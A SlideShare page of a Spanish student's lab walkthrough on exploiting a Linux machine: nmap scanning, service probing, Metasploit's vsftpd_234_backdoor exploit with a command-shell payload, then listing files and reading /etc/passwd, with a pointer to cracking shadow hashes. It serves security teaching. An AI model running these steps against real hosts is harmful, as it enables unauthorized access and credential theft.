SlideShare una empresa de Scribd logo

Explotación sistema operativo

Descargar como DOCX, PDF
M
Miguel Ángel Marchal Barrera

Este documento describe los pasos para escanear una red local, identificar sistemas operativos y servicios abiertos, explotar vulnerabilidades remotas utilizando Metasploit y acceder a una máquina de manera no autorizada para listar archivos y directorios. Se explican comandos como nmap, telnet, ftp y ssh para analizar puertos, servicios y versiones, así como usar exploits de Metasploit como vsftpd_234_backdoor para acceder de forma remota sin necesidad de credenciales.

Tecnología
Related topics:
Kali Linux
1 de 10
Descargar para leer sin conexión
1
2
3
4
5
6
7
8
9
10
Miguel Ángel Marchal Barrera COLEGIO CIUDAD DE LOS MUCHACHOS SISTEMAS MICROINFORMÁTICOS Y REDES CURSO 2016/2017 EXPLOTACIÓN SISTEMA OPERATIVO
PÁGINA 1|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS IDENTIFICACIÓN DEL OBJETIVO Comprobar si tenemosacceso a la máquina que queremosatacar Comandoping+ direccióndel interfazde red Abrirel terminal de Kali-linux Introducir:ping192.168.1.104 (esla direccióndel equipoaatacar) Si tenemosconectividad nose perderáningúnpaquete enviado Detectar los equiposactivos de la red Comandonmap –sP + direcciónde red Introducir:nmap–sP 192.168.1.0/24 Escaneala red enbusca de losequiposque estánfuncionandoenlaLAN mostrandolasMAC y lasdireccionesIPde cada equipo.
PÁGINA 2|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS ANÁLISIS DE PUERTOS Y SERVICIOS Identificaciónde puertosque usa la máquina Comandonmap –sT -O+ direccióndel interfazde red Introducir:nmap –sT -O192.168.1.104 Muestra lospuertosque utilizanlamáquinay laversióndel sistemaoperativo
PÁGINA 3|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Comprobar versionesde servicios Comandonmap –sT –sV direccióndel interfazde red Introducir:nmap –sT –sV 192.168.1.104 Muestra puertosabiertos,serviciosyversionesde éstos. Comprobar versionesde serviciosmediante comando telnet Comandotelnet+IP del interfazde red+ puertoabierto Introducir:telnet192.168.1.104 21 Muestra laversióndel serviciodelpuertoseleccionado parasabersi esposible que exista algunavulnerabilidadenlaversión.
PÁGINA 4|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Conexióna través del servicioseleccionado Comandotelnet,FTPySSH Accesocon comandotelnet Comandotelnet+IP interfazde red Introducir:telnet192.168.1.104 Accedemosala máquinaymuestrael interfazde textopidiendologin desconocido. Accesocon comandoFTP Comandoftp + IPinterfazde red Introducir:ftp192.168.1.104 Accesomediante servicioftppidiendocontraseña desconocida. Accesocon comandoSSH Comandossh + IP interfazde red Introducir:ssh 192.168.1.104 Accesomediante serviciosshpidiendocontraseña desconocida.
PÁGINA 5|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS ANÁLISIS DE VULNERABILIDADES Herramientametasploit Iniciarla herramientaintroduciendo:msfconsole Comprobarlos exploitsde laversiónque puedenhacervulnerable el accesoporel servicio Introducircomando:searchftp Lista de exploitsque podemosutilizarparaaccederde modo remotoa la máquinaque queremosatacar.
PÁGINA 6|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS EXPLOTACIÓN DE VULNERABILIDADES Localizamosel xploitpreparadoparaatacar Este exploitnosinformaque es excelente parausar. Para usar el xploit Comandouse + direccióndel exploit Introducir:use exploit/unix/ftp/vsftpd_234_backdoor Comprobarla configuraciónde parámetros Comandoshowoptions Introducir:showoptions Se compruebasi se necesitaalgunaconfiguraciónadicional parausarel exploit,necesitaremos configurarel RHOST asignandolaIPde lamáquinaatacada. RHOST: Remote Host. RPORT: Remote Port. ConfiguraciónRHOST ComandosetRHOST + direccióndel interfazde red Introducir:setRHOST 192.168.1.104
PÁGINA 7|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Buscar payloaddisponible Comandoshowpayloads Introducir:showpayloads Muestra el disponible Utilizarel payloaddisponible Comandosetpayload + payloaddisponible Introducir:setpayloadcmd/unix/interact Accederremotamente alamáquina Comandoexploit Introducior:exploit Accesopermitidoremotoalamáquinaatacada. Con este últimocomandohabremosaccedidoalamáquinafinalmente,sinnecesidadde login de ningúntipoy se podrá accedera losdirectoriosyarchivosde maneratransparante.
PÁGINA 8|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS POST-EXPLOTACIÓN DEL SISTEMA Uso de comandoscomosi estuviéramosenlamismamáquina. Comandols Directoriosde laraíz de la máquinaatacada.
PÁGINA 9|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Obtenciónde contraseña Comandocat Introducir:cat etc/passwd La estructuraes: <nombre>,<password><uid>, <gid>,<descripción opcional> <carpeta>, <shell> <nombre>: Nombre de usuario. <password>: Si es igual a “x” la contraseña está almacenada en /etc/shadow, si es igual a “!” el usuario está bloqueado y si es igual a “!!” no tiene contraseña. <uid>: Número de identificador, para root 0, para los demás un número entre 1 y 65535. <gid>: Grupo al que está asignado. <descripción opcional>: Descripción añadida al perfil de usuario. <carpeta>: Carpeta de inicio de usuario de cada usuario. <shell>: Intérprete de línea de comandos de Linux. Con esto no descifraremos la contraseña, sólo veremos los usuarios configurados, ésta está alojada en etc/shadowy está encriptada, para ello existen herramientas y tutoriales paso a paso para descifrarlas, en este link se explica cómo. https://www.youtube.com/watch?v=DntHkcbq-wY

Más contenido relacionado

PDF
Configuracion De Eigrp Y Loopback
César Nuñez
 
PPT
Seguridad layer 2
s3m1llon
 
PDF
Alarmas bts ericsson
Marcos Dominguez
 
DOCX
Carga del sistema operativo
Sebastian Gordillo
 
PDF
Laboratorio Crear, Verificar y Borrar Vlan
ccardila
 
PPT
Configuración acl extendida
Marbella Arroyo Gonzalez
 
PDF
Tutorial de configuracion de routers
Alexander Paiz
 
PDF
Practica 1 iptables
1 2d
 
Configuracion De Eigrp Y Loopback
César Nuñez
 
Seguridad layer 2
s3m1llon
 
Alarmas bts ericsson
Marcos Dominguez
 
Carga del sistema operativo
Sebastian Gordillo
 
Laboratorio Crear, Verificar y Borrar Vlan
ccardila
 
Configuración acl extendida
Marbella Arroyo Gonzalez
 
Tutorial de configuracion de routers
Alexander Paiz
 
Practica 1 iptables
1 2d
 

La actualidad más candente (20)

DOC
Ejercicio ccna 3
Sebastian Hevia
 
PDF
Examen l ry s diciembre2005 resuelto
Alfonso
 
PPTX
Ejercicio 23 05-2016 cisco packet tracer
Inmaculada Concepción
 
PPTX
EJERCICIOS EN PACKET TRACER
Daniella Park
 
PDF
Práctica final acl
chinazo
 
PPTX
Resumen comandos router
jlvive
 
PDF
Comandos Configuración Router CISCO
David Fernando Marìn
 
DOCX
compu
Lesly Elizalde
 
DOCX
Eliminar una vlan
Aime Rodriguez
 
PDF
Laboratorio Vlan
ccardila
 
DOCX
Solucion de acl juntas
Licenciatura en Redes y Sistemas Operativos
 
DOCX
Configurar vlan en packet tracer
Jushaya Wílliams
 
PPTX
Acl extendida
Yessica B. Leyva Avalos
 
PDF
Ejercicios ripv2
alejandro colan
 
PDF
Configurando Ospf Dr Y Bdr
César Nuñez
 
PDF
Comandos de configuracion de dispositivos cisco
CISCO NETWORKING
 
PDF
Configuración Firewall - CISCO ASA 5510
Vanesa Rodríguez Percy
 
PDF
Laboratorio 8 enrutamiento dinamico part 2
yoes1053
 
DOCX
Practica con firewall asa
websyo
 
PDF
Guia básica Packet Tracer
Erick Calderin
 
Ejercicio ccna 3
Sebastian Hevia
 
Examen l ry s diciembre2005 resuelto
Alfonso
 
Ejercicio 23 05-2016 cisco packet tracer
Inmaculada Concepción
 
EJERCICIOS EN PACKET TRACER
Daniella Park
 
Práctica final acl
chinazo
 
Resumen comandos router
jlvive
 
Comandos Configuración Router CISCO
David Fernando Marìn
 
compu
Lesly Elizalde
 
Eliminar una vlan
Aime Rodriguez
 
Laboratorio Vlan
ccardila
 
Solucion de acl juntas
Licenciatura en Redes y Sistemas Operativos
 
Configurar vlan en packet tracer
Jushaya Wílliams
 
Acl extendida
Yessica B. Leyva Avalos
 
Ejercicios ripv2
alejandro colan
 
Configurando Ospf Dr Y Bdr
César Nuñez
 
Comandos de configuracion de dispositivos cisco
CISCO NETWORKING
 
Configuración Firewall - CISCO ASA 5510
Vanesa Rodríguez Percy
 
Laboratorio 8 enrutamiento dinamico part 2
yoes1053
 
Practica con firewall asa
websyo
 
Guia básica Packet Tracer
Erick Calderin
 
Publicidad

Similar a Explotación sistema operativo (20)

DOCX
Documento24 practica 5
mariodl2479
 
PPTX
Escaneo de Puertos
arnoldvq16
 
PPTX
firewall.pptx
GISBERTYALICOCHOMBO4
 
PDF
Utilización del Software Optix Navigator.pdf
DavidSintiJabo1
 
PDF
Herramientas administrativas de red en diferentes sistemas operativos
YinaGarzon
 
PDF
Herramientas administrativas de red en diferentes sistemas operativos
YinaGarzon
 
DOCX
Practica 5 irdt
ssuser6c2014
 
DOCX
Practica 5 irdt
ssuser6c2014
 
DOCX
Practica 5 irdt
ssuser6c2014
 
PDF
Comandos utilizados en redes anderson alvarado 6to computacion
Ander Alvarado
 
PDF
Listas de acceso estándar y extendidas
JAV_999
 
PDF
Comandos red
reyes francisco sevilla ornelas
 
PDF
Listas de acceso
Leonoa Brises Sixtos
 
DOC
Practica 1 eigrp
w2k111984
 
PDF
Seguridad: Backtrack2
Francesc Perez
 
PDF
How to medidas de desempeño
miss051
 
PPT
Firewall
Miguel Guamán Bravo
 
PDF
Como usar Aircrack
Alfredo Fiebig
 
PDF
Taller
campus party
 
PDF
Linux red + VNC
Harol Hernan Torres Neuta
 
Documento24 practica 5
mariodl2479
 
Escaneo de Puertos
arnoldvq16
 
firewall.pptx
GISBERTYALICOCHOMBO4
 
Utilización del Software Optix Navigator.pdf
DavidSintiJabo1
 
Herramientas administrativas de red en diferentes sistemas operativos
YinaGarzon
 
Herramientas administrativas de red en diferentes sistemas operativos
YinaGarzon
 
Practica 5 irdt
ssuser6c2014
 
Practica 5 irdt
ssuser6c2014
 
Practica 5 irdt
ssuser6c2014
 
Comandos utilizados en redes anderson alvarado 6to computacion
Ander Alvarado
 
Listas de acceso estándar y extendidas
JAV_999
 
Comandos red
reyes francisco sevilla ornelas
 
Listas de acceso
Leonoa Brises Sixtos
 
Practica 1 eigrp
w2k111984
 
Seguridad: Backtrack2
Francesc Perez
 
How to medidas de desempeño
miss051
 
Firewall
Miguel Guamán Bravo
 
Como usar Aircrack
Alfredo Fiebig
 
Taller
campus party
 
Linux red + VNC
Harol Hernan Torres Neuta
 
Publicidad

Último (20)

PDF
Estrategia de Apoyo de Daylin Castaño (5).pdf
daylincastano1
 
DOCX
TRABAJO GRUPAL (5) (1).docxsjjsjsksksksksk
edeplucasmolina
 
PPTX
historia_web de la creacion de un navegador_presentacion.pptx
Carlos704324
 
PPTX
la-historia-de-la-medicina Edna Silva.pptx
adairrojas2
 
PPTX
modulo seguimiento 1 para iniciantes del
UcielnicolasMola
 
PDF
Diapositiva proyecto de vida, materia catedra
mpruiz3
 
PPTX
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
CarlosAndresuztes
 
PDF
PRESENTACIÓN GENERAL MIPIG - MODELO INTEGRADO DE PLANEACIÓN
CLAUDIAPATRICIASALAZ19
 
PPTX
CLAASIFICACIÓN DE LOS ROBOTS POR UTILIDAD
isabelfiallos99
 
DOCX
TRABAJO GRUPAL (5) (1).docxjesjssjsjjskss
edeplucasmolina
 
PPTX
Mecanismos-de-Propagacion de ondas electromagneticas
FernandoAjila
 
PDF
CONTABILIDAD Y TRIBUTACION, EJERCICIO PRACTICO
Pabloisra21Pepe
 
DOCX
Guía 5. Test de orientación Vocacional 2.docx
andresssespinosa59
 
PDF
TRABAJO DE TECNOLOGIA.pdf...........................
IsabellaReyesPerea
 
PPTX
El uso de las TIC en la vida cotidiana..
251755259
 
PPTX
Historia Inteligencia Artificial Ana Romero.pptx
adairrojas2
 
PDF
Tips de Seguridad para evitar clonar sus claves del portal bancario.pdf
saberpublicidadsas
 
PPTX
ccna: redes de nat ipv4 stharlling cande
StharllingCandelario
 
PDF
MANUAL de recursos humanos para ODOO.pdf
GianCruz26
 
PDF
programa-de-estudios-2011-guc3ada-para-el-maestro-secundarias-tecnicas-tecnol...
ParaVerPeliculas
 
Estrategia de Apoyo de Daylin Castaño (5).pdf
daylincastano1
 
TRABAJO GRUPAL (5) (1).docxsjjsjsksksksksk
edeplucasmolina
 
historia_web de la creacion de un navegador_presentacion.pptx
Carlos704324
 
la-historia-de-la-medicina Edna Silva.pptx
adairrojas2
 
modulo seguimiento 1 para iniciantes del
UcielnicolasMola
 
Diapositiva proyecto de vida, materia catedra
mpruiz3
 
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
CarlosAndresuztes
 
PRESENTACIÓN GENERAL MIPIG - MODELO INTEGRADO DE PLANEACIÓN
CLAUDIAPATRICIASALAZ19
 
CLAASIFICACIÓN DE LOS ROBOTS POR UTILIDAD
isabelfiallos99
 
TRABAJO GRUPAL (5) (1).docxjesjssjsjjskss
edeplucasmolina
 
Mecanismos-de-Propagacion de ondas electromagneticas
FernandoAjila
 
CONTABILIDAD Y TRIBUTACION, EJERCICIO PRACTICO
Pabloisra21Pepe
 
Guía 5. Test de orientación Vocacional 2.docx
andresssespinosa59
 
TRABAJO DE TECNOLOGIA.pdf...........................
IsabellaReyesPerea
 
El uso de las TIC en la vida cotidiana..
251755259
 
Historia Inteligencia Artificial Ana Romero.pptx
adairrojas2
 
Tips de Seguridad para evitar clonar sus claves del portal bancario.pdf
saberpublicidadsas
 
ccna: redes de nat ipv4 stharlling cande
StharllingCandelario
 
MANUAL de recursos humanos para ODOO.pdf
GianCruz26
 
programa-de-estudios-2011-guc3ada-para-el-maestro-secundarias-tecnicas-tecnol...
ParaVerPeliculas
 

Explotación sistema operativo

  • 1. Miguel Ángel Marchal Barrera COLEGIO CIUDAD DE LOS MUCHACHOS SISTEMAS MICROINFORMÁTICOS Y REDES CURSO 2016/2017 EXPLOTACIÓN SISTEMA OPERATIVO
  • 2. PÁGINA 1|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS IDENTIFICACIÓN DEL OBJETIVO Comprobar si tenemosacceso a la máquina que queremosatacar Comandoping+ direccióndel interfazde red Abrirel terminal de Kali-linux Introducir:ping192.168.1.104 (esla direccióndel equipoaatacar) Si tenemosconectividad nose perderáningúnpaquete enviado Detectar los equiposactivos de la red Comandonmap –sP + direcciónde red Introducir:nmap–sP 192.168.1.0/24 Escaneala red enbusca de losequiposque estánfuncionandoenlaLAN mostrandolasMAC y lasdireccionesIPde cada equipo.
  • 3. PÁGINA 2|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS ANÁLISIS DE PUERTOS Y SERVICIOS Identificaciónde puertosque usa la máquina Comandonmap –sT -O+ direccióndel interfazde red Introducir:nmap –sT -O192.168.1.104 Muestra lospuertosque utilizanlamáquinay laversióndel sistemaoperativo
  • 4. PÁGINA 3|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Comprobar versionesde servicios Comandonmap –sT –sV direccióndel interfazde red Introducir:nmap –sT –sV 192.168.1.104 Muestra puertosabiertos,serviciosyversionesde éstos. Comprobar versionesde serviciosmediante comando telnet Comandotelnet+IP del interfazde red+ puertoabierto Introducir:telnet192.168.1.104 21 Muestra laversióndel serviciodelpuertoseleccionado parasabersi esposible que exista algunavulnerabilidadenlaversión.
  • 5. PÁGINA 4|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Conexióna través del servicioseleccionado Comandotelnet,FTPySSH Accesocon comandotelnet Comandotelnet+IP interfazde red Introducir:telnet192.168.1.104 Accedemosala máquinaymuestrael interfazde textopidiendologin desconocido. Accesocon comandoFTP Comandoftp + IPinterfazde red Introducir:ftp192.168.1.104 Accesomediante servicioftppidiendocontraseña desconocida. Accesocon comandoSSH Comandossh + IP interfazde red Introducir:ssh 192.168.1.104 Accesomediante serviciosshpidiendocontraseña desconocida.
  • 6. PÁGINA 5|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS ANÁLISIS DE VULNERABILIDADES Herramientametasploit Iniciarla herramientaintroduciendo:msfconsole Comprobarlos exploitsde laversiónque puedenhacervulnerable el accesoporel servicio Introducircomando:searchftp Lista de exploitsque podemosutilizarparaaccederde modo remotoa la máquinaque queremosatacar.
  • 7. PÁGINA 6|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS EXPLOTACIÓN DE VULNERABILIDADES Localizamosel xploitpreparadoparaatacar Este exploitnosinformaque es excelente parausar. Para usar el xploit Comandouse + direccióndel exploit Introducir:use exploit/unix/ftp/vsftpd_234_backdoor Comprobarla configuraciónde parámetros Comandoshowoptions Introducir:showoptions Se compruebasi se necesitaalgunaconfiguraciónadicional parausarel exploit,necesitaremos configurarel RHOST asignandolaIPde lamáquinaatacada. RHOST: Remote Host. RPORT: Remote Port. ConfiguraciónRHOST ComandosetRHOST + direccióndel interfazde red Introducir:setRHOST 192.168.1.104
  • 8. PÁGINA 7|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Buscar payloaddisponible Comandoshowpayloads Introducir:showpayloads Muestra el disponible Utilizarel payloaddisponible Comandosetpayload + payloaddisponible Introducir:setpayloadcmd/unix/interact Accederremotamente alamáquina Comandoexploit Introducior:exploit Accesopermitidoremotoalamáquinaatacada. Con este últimocomandohabremosaccedidoalamáquinafinalmente,sinnecesidadde login de ningúntipoy se podrá accedera losdirectoriosyarchivosde maneratransparante.
  • 9. PÁGINA 8|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS POST-EXPLOTACIÓN DEL SISTEMA Uso de comandoscomosi estuviéramosenlamismamáquina. Comandols Directoriosde laraíz de la máquinaatacada.
  • 10. PÁGINA 9|9 MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS Obtenciónde contraseña Comandocat Introducir:cat etc/passwd La estructuraes: <nombre>,<password><uid>, <gid>,<descripción opcional> <carpeta>, <shell> <nombre>: Nombre de usuario. <password>: Si es igual a “x” la contraseña está almacenada en /etc/shadow, si es igual a “!” el usuario está bloqueado y si es igual a “!!” no tiene contraseña. <uid>: Número de identificador, para root 0, para los demás un número entre 1 y 65535. <gid>: Grupo al que está asignado. <descripción opcional>: Descripción añadida al perfil de usuario. <carpeta>: Carpeta de inicio de usuario de cada usuario. <shell>: Intérprete de línea de comandos de Linux. Con esto no descifraremos la contraseña, sólo veremos los usuarios configurados, ésta está alojada en etc/shadowy está encriptada, para ello existen herramientas y tutoriales paso a paso para descifrarlas, en este link se explica cómo. https://www.youtube.com/watch?v=DntHkcbq-wY